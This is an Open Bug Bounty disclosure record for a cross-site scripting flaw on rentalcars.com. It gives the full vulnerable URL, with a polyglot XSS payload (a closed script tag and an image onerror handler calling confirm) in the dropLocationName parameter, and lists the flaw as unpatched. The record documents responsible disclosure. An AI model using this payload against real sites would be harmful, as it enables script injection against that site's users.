rentalcars.com XSS vulnerability

2017-09-22T19:26:00
ID OBB:307432
Type openbugbounty
Reporter qiece
Modified 2017-12-24T11:18:00

Description

Vulnerable URL:
http://www.rentalcars.com/SearchResults.do?enabler=&country;=%D0%91%D0%B5%D0%BB%D0%B0%D1%80%D1%83%D1%81%D1%8C&doYear;=2017&city;=%D0%91%D1%80%D0%B5%D1%81%D1%82&driverage;=on&doFiltering;=true&dropCity;=%D0%91%D1%80%D0%B5%D1%81%D1%82&driversAge;=30&filterTo;=49&fromLocChoose;=true&dropLocationName;=111%3C!%27/*%22/*\%27/*\%22/*--%3E%3C/Script%3E%3CImage%20SrcSet=K%20*/;%20OnError=confirm`OPENBUGBOUNTY`%20//%3E#
Details:

Field| Value
---|---
Patched:| No
Latest check for patch:| 24.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 2551
VIP website status:| Yes
Check rentalcars.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Event| Date
---|---
Vulnerability submitted via Open Bug Bounty| 22 September, 2017 19:26 GMT
Vulnerability existence verified and confirmed| 25 September, 2017 10:43 GMT
Generic security notifications sent to website owner| 25 September, 2017 10:43 GMT
Notification sent to subscribers (without technical details)| 25 September, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 24 December, 2017 11:18 GMT